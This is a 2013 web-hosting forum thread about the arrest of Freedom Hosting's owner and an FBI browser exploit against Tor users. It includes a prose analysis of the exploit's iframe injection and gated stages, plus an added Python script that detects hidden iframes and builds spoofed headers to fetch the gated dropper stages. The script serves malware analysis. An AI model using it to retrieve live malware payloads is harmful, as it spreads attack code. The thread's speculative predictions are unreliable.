
Host Ultra / Freedom Hosting Owner Arrested

Just saw this over at WHT. Looks like the owner of Host Ultra/Freedom Hosting has been arrested by the FBI, and the Tor community happens to be massively affected by this...

BREAKING: HALF OF TOR SITES COMPROMISED, INCLUDING TORMAIL

The founder of Freedom Hosting has been arrested in Ireland and is awaiting extradition to USA.

In a crackdown that the FBI claims to be about hunting down pedophiles, half of the onion sites in the Tor network have been compromised, including the e-mail counterpart of the Tor deep web, TorMail.

http://www.independent.ie/irish-news/courts/fbi-bids-to-extradite-largest-childporn-dealer-on-planet-29469402.html

This is undoubtedly a big blow to the Tor community, crypto-anarchists, and more generally, to Internet anonymity. All of this is happening during DEF CON.

If you happen to use an account name and/or password combination that you have reused on the Tor deep web, change them NOW.

Eric Eoin Marques who was arrested runs a company called Host Ultra Limited.

http://www.solocheck.ie/Irish-Company/Host-Ultra-Limited-399806
http://www.hostultra.com/

He has an account at WebHosting Talk forums.

http://www.webhostingtalk.com/showthread.php?t=157698

A few days ago there were mass outages of Tor hidden services that predominantly affected Freedom Hosting websites.

http://postimg.org/image/ltj1j1j6v/

"Down for Maintenance
Sorry, This server is currently offline for maintenance. Please try again in a few hours."

If you saw this while browsing Tor, you went to an onion hosted by Freedom Hosting. The JavaScript exploit was injected into your browser if you had JavaScript enabled.

What the exploit does:

The JavaScript zero-day exploit creates a unique cookie and sends a request to a random server that basically fingerprints your browser in some way, which is probably then correlated somewhere else since the cookie doesn't get deleted. Presumably it reports the victim's IP back to the FBI.

An iframe is injected into FH-hosted sites:

TOR/FREEDOM HOST COMPROMISED
By: a guest on Aug 3rd, 2013
http://pastebin.com/pmGEj9bV

Which leads to this obfuscated code:

Javascript Mozilla Pastebin
Posted by Anonymous on Sun 4th Aug 02:52
http://pastebin.mozilla.org/2776374

FH STILL COMPROMISED
By: a guest on Aug 3rd, 2013
http://pastebin.com/K61QZpzb

FBI Hidden Service in connection with the JavaScript exploit:
7ydnpplko5lbgfx5

Who's affected / time scales:

Anyone who accessed an FH site in the past two days with JavaScript enabled. Eric Eoin Marques was arrested on Sunday so that's the earliest possible date.

"In this paper we expose flaws both in the design and implementation of Tor's hidden services that allow an attacker to measure the popularity of arbitrary hidden services, take down hidden services and deanonymize hidden services."
(Trawling for Tor Hidden Services: Detection, Measurement, Deanonymization)

http://www.ieee-security.org/TC/SP2013/papers/4977a080.pdf

The FBI Ran a Child Porn Site for Two Whole Weeks
http://gizmodo.com/why-the-fbi-ran-a-child-porn-site-for-two-whole-weeks-510247728

http://postimg.org/image/o4qaep8pz/

On any other day one would say these sick perverts got what they deserved. Unfortunately the Feds are stepping far beyond just pedophiles in this latest issue.

The js inserted at Freedom Hosting? Nothing really, just an iframe inject script with a UUID embedded server-side.

The iframe then delivers an exploit kit that appears to be a JavaScript 0day leading to...something. It only attempts to exploit Firefox (17 and up) on Windows NT. There's definitely some heap spraying and some possible shell code. The suspect shell code block contains some strings that look to formulate an HTTP request, but I haven't been able to collect the final payload yet. The shell code also contains the UUID with which the exploit was delivered. Any UUID will work to get this part of the exploit.

I'm still pulling this little bundle of malware apart. So far, I've got that the attack is split across three separate files, each loaded into an iframe. Calls are made between the frames to further obfuscate the control flow. The 'content_2.html' and 'content_3.html' files are only served up if the request "looks like" Firefox and has a correct Referer header. The 'content_2.html' is loaded from the main exploit iframe and in turn loads 'content_3.html'.

Short version. Preliminary analysis: This little thing probably CAN reach out without going through Tor. It appears to be exploiting the JavaScript runtime in Firefox to download something.

UPDATE: The exploit only affects Firefox 17 and involves several JS heap-sprays. Note that the current Extended Support Release is Firefox 17, so this may also affect some large organizations using Firefox ESR.

http://pastebin.mozilla.org/2777139

The script will only attempt the exploit on Firefox 17, so I'm no longer worried about it being some new 0day. Enough of the "Critical" MFSAs are for various sorts of memory corruption that I don't have the time to find out if this is actually a new exploit or something seen before.

http://postimg.org/image/mb66vvjsh/

Logical outcomes from this?

  1. FBI/NSA just shut down the #1 biggest hosting site and #1 most wanted person on Tor

  2. Silk Road is next on their list, being the #2 most wanted (#1 was child porn, #2 is drugs)

  3. Bitcoin and all cryptocurrencies set to absolutely CRASH as a result since the feds can not completely control this currency as they please.

I don't always call the Feds' agenda transparent, but when I do, I say they could be trying harder.

http://www.twitlonger.com/show/n_1rlo0uu

Personally I'm disgusted to see the owner was allowing this content to be hosted on his network, but at the same time it's scary to see what the FBI can do and how they caught these guys... looks like if you were browsing with Tor and you went to something that was hosted by Freedom Hosting, the FBI was able to use an exploit that was injected into your browser if you had JavaScript enabled. "The JavaScript zero-day exploit creates a unique cookie and sends a request to a random server that basically fingerprints your browser in some way, which is probably then correlated somewhere else since the cookie doesn't get deleted. Presumably it reports the victim's IP back to the FBI."

Very interesting indeed.
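The triage steps the post walks through (spot the hidden injected iframe on the "maintenance" page, pull the per-visitor UUID out of its src, note whether the frame leaves .onion space, and send a Firefox-looking User-Agent plus the right Referer so that content_2.html / content_3.html are actually served) as an added Python example. This is not the Freedom Hosting exploit, the pastebin code, or anything from the original post: the HTML, the onion hostname, the clearnet IP, the UUID and the gating model in server_would_serve are all constructed placeholders, and the User-Agent string is an assumed Firefox 17 ESR on Windows UA.

```python
"""Offline triage helper for a page suspected of carrying an injected iframe
dropper. Illustrative example added to this thread, not code from the post
or from the Freedom Hosting exploit. All sample data below is constructed."""
import re
from html.parser import HTMLParser
from urllib.parse import urljoin, urlparse

UUID_RE = re.compile(
    r"[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}", re.I)

# Assumed UA for the target the post names (Firefox 17 on Windows NT).
FIREFOX17_UA = "Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/20100101 Firefox/17.0"

# Constructed sample mirroring the post's description of the injected page.
# The onion hostname and the UUID are placeholders, not the real service.
SAMPLE_PAGE = """<html><body>
<p>Down for Maintenance</p>
<p>Sorry, This server is currently offline for maintenance. Please try again in a few hours.</p>
<iframe src="http://dropper-placeholder.onion/?uuid=3c2d9c3a-1f2e-4a71-9d3b-0a1a2b3c4d5e"
        width="0" height="0" style="display:none"></iframe>
</body></html>"""

# Constructed variant whose iframe points off the Tor network entirely
# (203.0.113.0/24 is a documentation range, so this address is a placeholder).
SAMPLE_CLEARNET = SAMPLE_PAGE.replace("dropper-placeholder.onion", "203.0.113.7")


class IframeCollector(HTMLParser):
    """Collect every <iframe>, flagging ones sized or styled to be invisible."""

    def __init__(self):
        super().__init__()
        self.iframes = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "iframe":
            return
        a = {k.lower(): (v or "") for k, v in attrs}
        style = a.get("style", "").replace(" ", "").lower()
        hidden = (a.get("width", "").strip() in ("0", "0px")
                  or a.get("height", "").strip() in ("0", "0px")
                  or "display:none" in style
                  or "visibility:hidden" in style)
        self.iframes.append({"src": a.get("src", ""), "hidden": hidden})


def find_iframes(html):
    p = IframeCollector()
    p.feed(html)
    p.close()
    return p.iframes


def extract_uuid(url):
    """The post says the UUID is embedded server-side per visitor; pull it out."""
    m = UUID_RE.search(url)
    return m.group(0).lower() if m else None


def is_onion(url):
    host = urlparse(url).hostname or ""
    return host.endswith(".onion")


def stage_request_headers(referer):
    """Headers to replay when pulling a gated stage (content_2 / content_3):
    a Firefox UA and the Referer of the frame that is supposed to load it."""
    return {"User-Agent": FIREFOX17_UA, "Referer": referer,
            "Accept": "text/html,application/xhtml+xml"}


def server_would_serve(headers, expected_referer):
    """Assumed model of the gate the post describes: the request must look
    like Firefox and carry the correct Referer, otherwise the stage is withheld."""
    ua = headers.get("User-Agent", "")
    looks_like_firefox = "Firefox/" in ua and "Gecko/" in ua
    return looks_like_firefox and headers.get("Referer") == expected_referer


def triage(html, page_url):
    """One finding per iframe: resolved src, hidden flag, embedded UUID,
    whether the frame leaves .onion space, and the headers needed to fetch
    the stage that frame would load next."""
    findings = []
    for f in find_iframes(html):
        src = urljoin(page_url, f["src"])
        findings.append({
            "src": src,
            "hidden": f["hidden"],
            "uuid": extract_uuid(src),
            "leaves_onion": not is_onion(src),
            "next_stage_headers": stage_request_headers(referer=src),
        })
    return findings


if __name__ == "__main__":
    for finding in triage(SAMPLE_PAGE, "http://victim-placeholder.onion/"):
        print(finding)
```

Run server_would_serve against the headers you intend to send before spending a fetch through Tor: a curl default UA or a missing Referer returns False, which is exactly why analysts replaying the original traffic saw nothing for content_2 and content_3. A hidden frame whose leaves_onion flag is True is the pattern the post warns about, a request that the browser may issue without going through Tor.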

Comments

  • perennate (Member, Provider)

    That's supposed to be breaking news?

  • @perennate said:
    That's supposed to be breaking news?

    Is it old news?

  • perennate (Member, Provider), edited September 2013

    34 days old. See the thread that @jake "just saw".

  • jar (Provider), edited September 2013

    I can't reasonably believe that he didn't know that he was hosting child porn, and for that I'd say good. However, others shouldn't have to pay the price for pedophiles and their enablers. You can't stop humans from doing things you don't like, so there's no point in setting the world on fire and killing us all just to flush them out. That extreme sentence illustrates that there IS such a thing as "too far, no longer justified by the cause." I do think they went too far in this operation.

    Founder @ MXroute

  • Maounique (Member), edited September 2013

    For people that do not know how to protect from this kind of attack:
    1. Route all traffic over Tor; the best way is to use a VM and have its gateway be a router which only goes over Tor;
    2. You do not need a host to have your underground site, you can host it at home. Besides, Tor is made for anonymizing traffic, not for hosting hidden content, that can be done very well with other means. Same goes for mail;
    3. The child porn story was always used as a cover up, so nothing new there. Perhaps they sometimes add a terrorism colouring over it, but it is so obvious for everyone that cp addicts are not into religion too that it was ludicrous and lately only the CP was used, perhaps they will add the drugs colouring too, that makes a bit more sense.

    Extremist conservative user, I wish to preserve human and civil rights, free speech, freedom of the press and worship, rule of law, democracy, peace and prosperity, social mobility, etc. Now you can draw your guns.

  • perennate (Member, Provider)

    You shouldn't use an anonymous hosting provider; it seems like that defeats half the point.

  • @perennate said:
    34 days old. See the thread that jake "just saw".

    In that sense any news is old news the moment it's posted. There's always something newer.

    Tor and Bitcoin are sure taking the toll.

    Serving you the best VPS, Web hosting, dedicated servers and more - Cloud Shards | Query Foundry
    We operate the network AS62638 | Available in Syd AU and Dallas, Los Angeles and NYC USA
  • Instead of spending all that money to raid bitcoin operators they could get by cheaper buying the entire stock and manipulating the market, making some profit in the process. That won't be much more illegal than running a child porn site.

    Extremist conservative user, I wish to preserve human and civil rights, free speech, freedom of the press and worship, rule of law, democracy, peace and prosperity, social mobility, etc. Now you can draw your guns.

  • perennate (Member, Provider), edited September 2013

    @concerto49 said:
    In that sense any news is old news the moment it's posted. There's always something newer.

    I mean this was posted already, a month ago on LET.

    Edit: hm, maybe it wasn't posted here. Was on vpsboard.com though. Confusing with the two sites... anyway a month old is much more than <1w old.

  • @perennate said:
    Edit: hm, maybe it wasn't posted here. Was on vpsboard.com though. Confusing with the two sites... anyway a month old is much more than <1w old.

    Agrees on that part. Jake seems to be reposting old news non-stop.

    Serving you the best VPS, Web hosting, dedicated servers and more - Cloud Shards | Query Foundry
    We operate the network AS62638 | Available in Syd AU and Dallas, Los Angeles and NYC USA
  • @Maounique said:
    For people that do not know how to protect from this kind of attack:

    1. The child porn story was always used as a cover up, so nothing new there. Perhaps they sometimes add a terrorism colouring over it, but it is so obvious for everyone that cp addicts are not into religion too that it was ludicrous and lately only the CP was used, perhaps they will add the drugs colouring too, that makes a bit more sense.

    It's TOR, so it's not like child porn wasn't there. Don't be mad at the FBI over this, be mad at the horse's ass who willingly took money from people wanting to host child porn who also put his legitimate customers in jeopardy in the process.

    Contractually bound by a verbal non-disclosure agreement

  • There's no freedom of speech when it comes to child porn. Lock the guy up with other sexual offenders and see how he likes that.

    I'm really talented at telling SolusVM to reinstall my OS. I can help you do it, too, for absolutely fee.
